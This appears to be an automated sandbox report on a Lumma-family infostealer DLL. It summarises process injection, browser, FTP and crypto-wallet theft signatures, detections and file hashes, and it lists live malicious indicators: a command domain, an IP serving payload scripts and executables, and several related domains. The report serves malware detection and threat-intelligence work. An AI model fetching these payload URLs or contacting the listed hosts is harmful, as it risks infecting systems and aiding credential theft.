            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580147 Sample: iviewers.dll Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 103 volcanoyev.click 2->103 117 Suricata IDS alerts for network traffic 2->117 119 Found malware configuration 2->119 121 Malicious sample detected (through community Yara rule) 2->121 123 15 other signatures 2->123 11 loaddll32.exe 10 2->11         started        signatures3 process4 process5 13 regsvr32.exe 9 11->13         started        16 powershell.exe 11->16         started        19 cmd.exe 1 11->19         started        21 3 other processes 11->21 file6 97 C:\Users\user\AppData\...\snjgawjs.cmdline, Unicode 13->97 dropped 23 powershell.exe 13->23         started        27 csc.exe 3 13->27         started        99 C:\Users\user\AppData\Local\...\rcv5n2si.0.cs, Unicode 16->99 dropped 109 Writes to foreign memory regions 16->109 111 Injects a PE file into a foreign processes 16->111 30 RegAsm.exe 16->30         started        32 csc.exe 16->32         started        42 3 other processes 16->42 34 rundll32.exe 9 19->34         started        101 C:\Users\user\AppData\Local\...\ceo01y5g.dll, PE32 21->101 dropped 36 powershell.exe 21->36         started        38 csc.exe 3 21->38         started        40 cvtres.exe 21->40         started        signatures7 process8 dnsIp9 105 147.45.44.131, 49706, 49707, 49708 FREE-NET-ASFREEnetEU Russian Federation 23->105 131 Found many strings related to Crypto-Wallets (likely being stolen) 23->131 133 Writes to foreign memory regions 23->133 135 Suspicious execution chain found 23->135 147 2 other signatures 23->147 44 csc.exe 23->44         started        56 3 other processes 23->56 85 C:\Users\user\AppData\Local\...\snjgawjs.dll, PE32 27->85 dropped 59 2 other processes 27->59 137 Query firmware table information (likely to detect VMs) 30->137 139 Tries to harvest and steal ftp login credentials 30->139 141 Tries to harvest and steal browser information (history, passwords, etc) 30->141 143 Tries to steal Crypto Currency Wallets 30->143 87 C:\Users\user\AppData\Local\...\rcv5n2si.dll, PE32 32->87 dropped 47 cvtres.exe 32->47         started        49 powershell.exe 34->49         started        52 csc.exe 34->52         started        145 Injects a PE file into a foreign processes 36->145 54 csc.exe 36->54         started        61 2 other processes 36->61 89 C:\Users\user\AppData\Local\...\zhytdsxg.dll, PE32 38->89 dropped 63 2 other processes 38->63 file10 signatures11 process12 dnsIp13 91 C:\Users\user\AppData\Local\...\ljtzeyvh.dll, PE32 44->91 dropped 65 cvtres.exe 44->65         started        113 Writes to foreign memory regions 49->113 115 Injects a PE file into a foreign processes 49->115 67 RegAsm.exe 49->67         started        70 csc.exe 49->70         started        73 conhost.exe 49->73         started        93 C:\Users\user\AppData\Local\...\shgzzqqc.dll, PE32 52->93 dropped 75 conhost.exe 52->75         started        77 cvtres.exe 52->77         started        95 C:\Users\user\AppData\Local\...\tkky4heb.dll, PE32 54->95 dropped 79 cvtres.exe 54->79         started        107 volcanoyev.click 172.67.195.241, 443, 49709, 49710 CLOUDFLARENETUS United States 56->107 file14 signatures15 process16 file17 125 Query firmware table information (likely to detect VMs) 67->125 127 Found many strings related to Crypto-Wallets (likely being stolen) 67->127 129 Tries to steal Crypto Currency Wallets 67->129 83 C:\Users\user\AppData\Local\...\pejlabp5.dll, PE32 70->83 dropped 81 cvtres.exe 70->81         started        signatures18 process19

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            iviewers.dll39%VirustotalBrowse
            iviewers.dll37%ReversingLabsWin32.Spyware.Lummastealer

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dll100%AviraHEUR/AGEN.1300034
            C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dll100%AviraHEUR/AGEN.1300034
            C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dll100%AviraHEUR/AGEN.1300034
            C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dll100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dll100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dll100%Joe Sandbox ML

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://volcanoyev.click/api9100%Avira URL Cloudmalware
            http://147.45.44.1310%Avira URL Cloudsafe
            https://volcanoyev.click/api100%Avira URL Cloudmalware
            http://147.45.44.131/infopage/inbg.exe0%Avira URL Cloudsafe
            http://crl.micro:b0%Avira URL Cloudsafe
            https://volcanoyev.click/100%Avira URL Cloudmalware
            https://volcanoyev.click/D100%Avira URL Cloudmalware
            https://volcanoyev.click/4100%Avira URL Cloudmalware
            https://volcanoyev.click/L100%Avira URL Cloudmalware
            https://volcanoyev.click:443/apiohrz.default-release/key4.dbPK100%Avira URL Cloudmalware
            http://147.45.4480%Avira URL Cloudsafe
            https://volcanoyev.click/e100%Avira URL Cloudmalware
            http://147.45.44.131/infopage/ybfh.ps1U0%Avira URL Cloudsafe
            volcanoyev.click100%Avira URL Cloudmalware
            http://147.45.44.131/infopage/oung.exe0%Avira URL Cloudsafe
            https://volcanoyev.click:443/api100%Avira URL Cloudmalware
            http://crl.micro?0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/ybfh.ps10%Avira URL Cloudsafe
            https://volcanoyev.click/apiSa100%Avira URL Cloudmalware
            https://volcanoyev.click/apin100%Avira URL Cloudmalware
            https://volcanoyev.click/apiU100%Avira URL Cloudmalware
            https://volcanoyev.click/k?100%Avira URL Cloudmalware
            https://volcanoyev.click/Y100%Avira URL Cloudmalware
            https://volcanoyev.click/W100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            volcanoyev.click
            		172.67.195.241
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              necklacebudi.latfalse
                		high
                aspecteirs.latfalse
                  		high
                  energyaffai.latfalse
                    		high
                    https://volcanoyev.click/apitrue
                    • Avira URL Cloud: malware
                    		unknown
                    volcanoyev.clicktrue
                    • Avira URL Cloud: malware
                    		unknown
                    sustainskelet.latfalse
                      		high
                      http://147.45.44.131/infopage/ybfh.ps1true
                      • Avira URL Cloud: safe
                      		unknown
                      crosshuaht.latfalse
                        		high
                        rapeflowwj.latfalse
                          		high
                          grannyejh.latfalse
                            		high
                            discokeyus.latfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.1609901771.00000000063EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1623710657.00000000056EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1576756464.000000000634C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001B.00000002.1650397592.00000000048F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://volcanoyev.click/DRegAsm.exe, 00000023.00000002.1754899784.00000000011E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://crl.microsoftpowershell.exe, 0000000F.00000002.1629065195.0000000006D95000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1579325198.00000000079BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001B.00000002.1650397592.00000000048F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 0000000F.00000002.1605796075.0000000004E5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.0000000004D20000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://147.45.44.131/infopage/inbg.exepowershell.exe, 0000001B.00000002.1650397592.0000000004CB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://contoso.com/Licensepowershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Iconpowershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://volcanoyev.click/LRegAsm.exe, 00000023.00000002.1754899784.00000000011E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://volcanoyev.click/api9RegAsm.exe, 00000029.00000002.1807822091.00000000010ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://volcanoyev.click/RegAsm.exe, 00000029.00000002.1806244051.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1807822091.00000000010F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://volcanoyev.click/4RegAsm.exe, 00000029.00000002.1806244051.00000000010B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://volcanoyev.click:443/apiohrz.default-release/key4.dbPKRegAsm.exe, 00000023.00000002.1754899784.000000000117D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://github.com/Pester/Pesterpowershell.exe, 0000001B.00000002.1650397592.00000000048F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.micro:bpowershell.exe, 00000014.00000002.1578974277.0000000007929000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://147.45.44.131powershell.exe, 0000000D.00000002.1589335298.00000000054D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1589335298.000000000570B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1589335298.000000000588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004B94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.00000000049D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.0000000004CB2000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://147.45.448powershell.exe, 00000014.00000002.1570488674.0000000005652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005E1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://volcanoyev.click/apinRegAsm.exe, 00000023.00000002.1754899784.0000000001157000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1807822091.00000000010ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://147.45.44.131/infopage/ybfh.ps1Upowershell.exe, 0000000F.00000002.1628755602.0000000006D63000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://volcanoyev.click/eRegAsm.exe, 00000023.00000002.1754899784.00000000011E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://crl.micropowershell.exe, 0000001B.00000002.1670598769.0000000006FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://aka.ms/pscore6lBpowershell.exe, 0000000D.00000002.1589335298.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.00000000047A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://volcanoyev.click:443/apiRegAsm.exe, RegAsm.exe, 00000029.00000002.1807822091.0000000001107000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://147.45.44.131/infopage/oung.exepowershell.exe, 0000001B.00000002.1650397592.0000000004B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://contoso.com/powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.1609901771.00000000063EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1623710657.00000000056EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1576756464.000000000634C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://volcanoyev.click/apiSaRegAsm.exe, 00000023.00000002.1754899784.00000000011C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://crl.micro?powershell.exe, 0000000F.00000002.1601052768.0000000000808000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://volcanoyev.click/apiURegAsm.exe, 0000001F.00000002.1586661294.0000000000C73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://volcanoyev.click/k?RegAsm.exe, 00000020.00000002.1591162034.0000000000ADB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://volcanoyev.click/WRegAsm.exe, 00000020.00000002.1590077351.0000000000AA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameloaddll32.exe, 00000000.00000002.1679599025.0000000002731000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1626426593.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1636762344.00000000051F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1588613450.0000000004761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1589335298.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.00000000047A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://volcanoyev.click/YRegAsm.exe, 0000001F.00000002.1586661294.0000000000C73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        172.67.195.241
                                                        		volcanoyev.clickUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        147.45.44.131
                                                        		unknownRussian Federation
                                                        		2895FREE-NET-ASFREEnetEUtrue

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1580147
                                                        Start date and time:2024-12-24 02:17:08 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 34s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:44
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:iviewers.dll
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.expl.evad.winDLL@71/60@1/2
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HCA Information:
                                                        • Successful, ratio: 98%
                                                        • Number of executed functions: 71
                                                        • Number of non-executed functions: 69
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .dll
                                                        • Stop behavior analysis, all processes terminated

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 4.245.163.56
                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target RegAsm.exe, PID 4132 because there are no executed function
                                                        • Execution Graph export aborted for target RegAsm.exe, PID 4352 because there are no executed function
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        20:18:11API Interceptor142x Sleep call for process: powershell.exe modified
                                                        20:18:20API Interceptor17x Sleep call for process: RegAsm.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        172.67.195.241Voice_Message.htmlGet hashmaliciousHTMLPhisherBrowse
                                                          147.45.44.131Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                          • 147.45.44.131/infopage/bnkh.exe
                                                          htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 147.45.44.131/infopage/ung0.exe
                                                          Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                          • 147.45.44.131/infopage/ilk.exe
                                                          Captcha.htaGet hashmaliciousHTMLPhisherBrowse
                                                          • 147.45.44.131/infopage/bgfi.ps1
                                                          Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                          • 147.45.44.131/infopage/ung0.exe
                                                          EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 147.45.44.131/infopage/vsom.exe
                                                          MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                          • 147.45.44.131/infopage/Tom.exe
                                                          ZjH6H6xqo7.exeGet hashmaliciousLummaCBrowse
                                                          • 147.45.44.131/infopage/tvh53.exe
                                                          nlJ2sNaZVi.exeGet hashmaliciousLummaCBrowse
                                                          • 147.45.44.131/infopage/tbh75.exe
                                                          TZ33WZy6QL.exeGet hashmaliciousLummaCBrowse
                                                          • 147.45.44.131/infopage/tbg9.exe

                                                          Domains

                                                          No context

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUSLoader.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.145.201
                                                          Collapse.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.199.72
                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 104.21.48.1
                                                          AxoPac.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.184.241
                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.169.205
                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                          • 188.114.96.6
                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                          • 188.114.96.6
                                                          'Set-up.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.169.205
                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.191.144
                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.27.229
                                                          FREE-NET-ASFREEnetEUCollapse.exeGet hashmaliciousLummaCBrowse
                                                          • 147.45.47.81
                                                          nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                          • 147.45.49.155
                                                          7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                          • 147.45.49.155
                                                          6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                          • 147.45.49.155
                                                          FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                          • 147.45.49.155
                                                          lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                          • 147.45.49.155
                                                          jqplot.htaGet hashmaliciousUnknownBrowse
                                                          • 147.45.112.248
                                                          KNkr78hyig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 147.45.113.159
                                                          Tsy9P2T9yF.exeGet hashmaliciousUnknownBrowse
                                                          • 147.45.113.159
                                                          kGxQbLOG7s.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 147.45.113.159

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          a0e9f5d64349fb13191bc781f81f42e1Loader.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.195.241
                                                          Collapse.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.195.241
                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.195.241
                                                          AxoPac.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.195.241
                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.195.241
                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.195.241
                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.195.241
                                                          'Set-up.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.195.241
                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.195.241
                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.195.241

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\loaddll32.exe.log

                                                          Download File
                                                          Process:C:\Windows\System32\loaddll32.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):410
                                                          Entropy (8bit):5.361827289088002
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/hhkvoDLI4MWuCq1KDLI4M9tDLI4MWuPTAv:MLUE4Kx1qE4qpE4KO
                                                          MD5:44B4D94ACD354843DF96E9CCF8E41D29
                                                          SHA1:BC5FDBADA2053E785B6C87244E4C545F70C282CE
                                                          SHA-256:E8F78742901691AC4C6473A754BEA72FEF8E723030E46F8B912C14AC1B222C99
                                                          SHA-512:5E7A345EFFC080091CCA25B6668ECECF998B6D8E0CEDE86B58B6066A869F09AB62FDB89F704FADC97BC1EB0EE4509D94250AD0FA3350FC9F0CEBA3AB69D1D805
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\regsvr32.exe.log

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\regsvr32.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):410
                                                          Entropy (8bit):5.361827289088002
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/hhkvoDLI4MWuCq1KDLI4M9tDLI4MWuPTAv:MLUE4Kx1qE4qpE4KO
                                                          MD5:44B4D94ACD354843DF96E9CCF8E41D29
                                                          SHA1:BC5FDBADA2053E785B6C87244E4C545F70C282CE
                                                          SHA-256:E8F78742901691AC4C6473A754BEA72FEF8E723030E46F8B912C14AC1B222C99
                                                          SHA-512:5E7A345EFFC080091CCA25B6668ECECF998B6D8E0CEDE86B58B6066A869F09AB62FDB89F704FADC97BC1EB0EE4509D94250AD0FA3350FC9F0CEBA3AB69D1D805
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):410
                                                          Entropy (8bit):5.361827289088002
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/hhkvoDLI4MWuCq1KDLI4M9tDLI4MWuPTAv:MLUE4Kx1qE4qpE4KO
                                                          MD5:44B4D94ACD354843DF96E9CCF8E41D29
                                                          SHA1:BC5FDBADA2053E785B6C87244E4C545F70C282CE
                                                          SHA-256:E8F78742901691AC4C6473A754BEA72FEF8E723030E46F8B912C14AC1B222C99
                                                          SHA-512:5E7A345EFFC080091CCA25B6668ECECF998B6D8E0CEDE86B58B6066A869F09AB62FDB89F704FADC97BC1EB0EE4509D94250AD0FA3350FC9F0CEBA3AB69D1D805
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1510207563435464
                                                          Encrypted:false
                                                          SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                          MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                          SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                          SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                          SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                          Malicious:false
                                                          Preview:@...e.................................^..............@..........

                                                          C:\Users\user\AppData\Local\Temp\RES61E6.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 24 02:42:25 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1332
                                                          Entropy (8bit):3.987742097231897
                                                          Encrypted:false
                                                          SSDEEP:24:HDFzW9nqGqtHDwKTF9mfwI+ycuZhN9akSrPNnqS2d:oqGe0KTfmo1ul9a3BqSG
                                                          MD5:8B55EC3E89B66EEEF9DCCEB2584517DD
                                                          SHA1:07F01170CCF94AE9485B33B9BCDBDB5EFC6F18D0
                                                          SHA-256:7B09C959076AE0323BB04A304E98AA2DEE16628D5FFB5112D03396D301D69C5E
                                                          SHA-512:5B6BA0B059C1710AB716EC302EA4FE79EE69BFBC68030F5C80B5BBB3BFE862710177C29741CB3BCD23900C2FE72E7000F9FACCF2EAB4C68DD1D9CCA93328ABDC
                                                          Malicious:false
